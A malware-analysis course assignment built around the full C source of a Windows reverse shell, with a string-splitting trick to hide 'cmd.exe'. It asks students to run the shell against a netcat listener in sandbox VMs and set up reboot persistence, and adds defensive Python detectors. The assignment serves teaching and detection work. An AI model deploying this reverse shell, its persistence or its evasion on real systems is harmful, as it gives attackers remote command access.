CAP 4145 Introduction to Malware Analysis

Assignment 6 – Analyze Malicious Windows Programs

19 points

Instructions:

  • Note: Blue text points to a web link. Ctrl + Click to follow the link.
  • This is a team assignment. However, every student MUST submit the term project report even if all members of a group submit the same report.
  • Answers to all questions must be put into ONE document. That is, each student submits exactly one report document that answers all questions of this assignment, unless explicitly stated otherwise.
  • Students must put the answer to each question directly after that question in this assignment. The instructor will not grade a report that contains only answers, and the student gets zero for such an assignment. An assignment report must include the original questions.
  • Students MUST submit the finished assignment in either Microsoft Word or PDF format to Webcourse. The document must be submitted as ONE standalone file and cannot be tarred or zipped into a container.
  • All required files or docs must be submitted in one submission (the last submission). Note: Blackboard allows an unlimited number of submissions of one assignment by students.
  • Refer to Print screen for how to take a screenshot. Pressing the Alt key in combination with PrtSc captures the currently selected window.

Problems:

Answer each question following the original question. Do NOT delete the original question.

The students are provided SimpleReverseShell.7z, which contains source code of a reverse shell.

Requirements:

  • The code shell.c in SimpleReverseShell.7z is given below. The students can refer to readme.txt in SimpleReverseShell.7z and search Google for specific APIs. Answer the questions following the code below.
  • Please read compile.sh and revise it for the programming environment chosen by the students. Hint: The programming environment is similar to the one in Assignment 5.
    • Paste the revised compile.sh following this question. (2 points)
    • Run compile.sh and provide a screenshot that shows the compiled program. (1 point)
  • Please read readme.txt and understand how to run the program. That is, the students should first start an nc (netcat) command as a server that accepts incoming connections on the sandbox VM LINUX01. On the sandbox VM WINHOST01, the students then start the malware.
    • Please write down the commands the students run on LINUX01 and WINHOST01 following this question. (2 points)
    • Please provide a screenshot that shows the result of running the malware. (1 point)
  • Please select an approach so that the malware can start when WINHOST01 reboots.
    • Please explain the chosen approach. (2 points)
    • Please post related commands or screenshots following this question to show the chosen approach works. (2 points)
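The run described above, seen from the defender's side: the program on WINHOST01 opens an outbound TCP connection to the listener and then hands a cmd.exe child that socket as its standard I/O, so endpoint telemetry shows a process that connects out and shortly afterwards spawns a shell. The following Python script is an added example, not part of the assignment materials or of SimpleReverseShell.7z; it correlates constructed process-creation and network-connection records (field names loosely modelled on Sysmon Event IDs 1 and 3, but the records themselves are made up here) and flags that sequence.

```python
"""Correlate process-creation and network-connection events to flag the
reverse-shell pattern in shell.c: a process initiates an outbound TCP
connection and then spawns cmd.exe as a child.

Added example, not part of the assignment. The event records below are
constructed, with field names loosely modelled on Sysmon Event ID 1
(process create) and Event ID 3 (network connect)."""
from collections import defaultdict

# Constructed sample telemetry (not real logs).
EVENTS = [
    {"id": 1, "ts": 100, "pid": 4012, "image": r"C:\Users\lab\shell.exe",
     "ppid": 3200, "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 3, "ts": 101, "pid": 4012, "image": r"C:\Users\lab\shell.exe",
     "initiated": True, "dst_ip": "10.0.0.5", "dst_port": 4444},
    {"id": 1, "ts": 102, "pid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "ppid": 4012, "parent_image": r"C:\Users\lab\shell.exe"},
    # Benign noise: a browser connects out, and explorer launches cmd.exe.
    {"id": 3, "ts": 103, "pid": 5000, "image": r"C:\Program Files\browser.exe",
     "initiated": True, "dst_ip": "93.184.216.34", "dst_port": 443},
    {"id": 1, "ts": 104, "pid": 5100, "image": r"C:\Windows\System32\cmd.exe",
     "ppid": 3200, "parent_image": r"C:\Windows\explorer.exe"},
]

# Executables treated as shells when they appear as the child.
SHELLS = {"cmd.exe", "powershell.exe"}


def find_reverse_shell_candidates(events, window=30):
    """Return (parent_pid, parent_image, dst_ip, dst_port, child_pid) for every
    shell process created within `window` seconds after its parent process
    initiated an outbound connection."""
    # pid -> list of (timestamp, dst_ip, dst_port) for outbound connects
    connects = defaultdict(list)
    for ev in events:
        if ev["id"] == 3 and ev.get("initiated"):
            connects[ev["pid"]].append((ev["ts"], ev["dst_ip"], ev["dst_port"]))

    hits = []
    for ev in events:
        if ev["id"] != 1:
            continue
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name not in SHELLS:
            continue
        # Did the parent connect out shortly before spawning this shell?
        for ts, ip, port in connects.get(ev["ppid"], []):
            if 0 <= ev["ts"] - ts <= window:
                hits.append((ev["ppid"], ev["parent_image"], ip, port, ev["pid"]))
    return hits


if __name__ == "__main__":
    for hit in find_reverse_shell_candidates(EVENTS):
        print("possible reverse shell:", hit)
```

In real telemetry, key on the process GUID rather than the PID, since PIDs are reused, and widen `SHELLS` to whatever interpreters your environment treats as shells; the time window is a tuning knob, not a property of the technique.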

// shell.c
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* strcpy() */

/* Link against the Winsock 2 library. The pragma is honoured by MSVC only;
   GCC/MinGW ignores it, so compile.sh has to pass -lws2_32 explicitly. */
#pragma comment(lib, "ws2_32")

WSADATA wsaData;                      /* filled in by WSAStartup() */
SOCKET Winsock;                       /* socket connected back to the listener */
SOCKET Sock;                          /* declared but never used */
struct sockaddr_in hax;               /* listener address (IPv4 address + port) */
char aip_addr[16];                    /* dotted-decimal IP string, "255.255.255.255" + NUL */
STARTUPINFO ini_processo;             /* start-up parameters for the child process */
PROCESS_INFORMATION processo_info;    /* child handles and IDs returned by CreateProcess() */

int main(int argc, char *argv[])
{
    /* Initialise Winsock, requesting version 2.2. */
    WSAStartup(MAKEWORD(2,2), &wsaData);

    /* Create a TCP/IPv4 socket. WSASocket() with dwFlags = 0 (no
       WSA_FLAG_OVERLAPPED) yields a handle that can later serve as a
       standard I/O handle of another process. */
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

    /* argv[1] = host name or IP of the listener, argv[2] = port.
       Only the first argument is checked; a missing argv[2] is not caught. */
    if (argv[1] == NULL){
        exit(1);
    }

    /* Resolve the listener host name to an IPv4 address ... */
    struct hostent *host;
    host = gethostbyname(argv[1]);
    /* ... and copy its first address as a dotted-decimal string. */
    strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

    /* Fill in the destination: IPv4, port converted to network byte order,
       address converted from the string back to its 32-bit binary form. */
    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi(argv[2]));
    hax.sin_addr.s_addr =inet_addr(aip_addr);

    /* Connect to the listener. */
    WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL);

    /* Continue only if the connect reported no error. */
    if (WSAGetLastError() == 0) {
        /* Zero the STARTUPINFO, set its size, and tell CreateProcess() to
           take the child's stdin/stdout/stderr from this structure ... */
        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb=sizeof(ini_processo);
        ini_processo.dwFlags=STARTF_USESTDHANDLES;
        /* ... all three of which are the connected socket. */
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

        /* "cmd.exe" is stored as four fragments so the whole string never
           appears in the binary; snprintf() joins them at run time into an
           8-byte buffer (7 characters plus the terminating NUL). */
        char *myArray[4] = { "cm", "d.e", "x", "e" };
        char command[8] = "";
        snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

        /* Launch cmd.exe; bInheritHandles = TRUE lets the child inherit the
           socket handle, so its console I/O flows over the TCP connection. */
        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);

        exit(0);
    } else {
        exit(0);
    }
}

  • Please add a comment to each instruction above explaining what it does. (8 points)
  • Please explain what this program does. (1 point)
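One detail worth noticing when answering the questions above: "cmd.exe" never appears intact in shell.c, only as the fragments "cm", "d.e", "x" and "e" that snprintf() joins at run time, so a plain strings pass over the compiled binary will not show the command. The Python below is an added example, not part of the assignment materials or of SimpleReverseShell.7z; it extracts printable strings from a constructed byte blob laid out the way those literals might sit in the binary's data section, then checks whether runs of adjacent fragments join into a watched name.

```python
"""Reassemble split string literals found in a binary's data.

shell.c stores "cmd.exe" as four fragments ("cm", "d.e", "x", "e"), so a
strings(1) pass never shows the full command. This added example (not part
of the assignment) extracts printable strings from a byte blob and reports
runs of adjacent strings that concatenate into a watched name. BLOB is a
constructed stand-in for a .rdata section; a real sample would be read
from the file."""
import re

# Names whose fragmented presence an analyst wants flagged (lower-case).
WATCHLIST = {"cmd.exe", "powershell.exe", "ws2_32.dll"}

# Constructed blob: the four fragments from shell.c, one ordinary string,
# the snprintf format string, and some non-printable filler.
BLOB = (b"\x00\x00cm\x00d.e\x00x\x00e\x00"
        b"Winsock init failed\x00"
        b"%s%s%s%s\x00"
        b"\x90\x90\x90")


def extract_strings(blob, min_len=1):
    """Return runs of printable ASCII of at least min_len characters, in
    file order (NUL bytes and other non-printables delimit them)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def reassemble_fragments(strings, watchlist=WATCHLIST, max_fragments=6):
    """For each starting position, concatenate up to max_fragments consecutive
    strings and record any result that equals a watched name. Returns a list
    of (assembled_name, fragments). A single unsplit "cmd.exe" is reported as
    a run of length 1."""
    findings = []
    for start in range(len(strings)):
        joined = ""
        for end in range(start, min(start + max_fragments, len(strings))):
            joined += strings[end]
            key = joined.lower()
            if key in watchlist:
                findings.append((joined, strings[start:end + 1]))
                break
            # Stop early once no watched name can begin with this prefix.
            if not any(w.startswith(key) for w in watchlist):
                break
    return findings


if __name__ == "__main__":
    found = extract_strings(BLOB)
    print("raw strings:", found)
    for name, parts in reassemble_fragments(found):
        print(f"{name!r} assembled from {parts}")
```

The adjacency assumption is a heuristic: compilers may reorder or merge literals, so a miss here is not proof of absence. The reliable confirmation is dynamic, watching the `command` buffer after the snprintf() call in a debugger inside the sandbox.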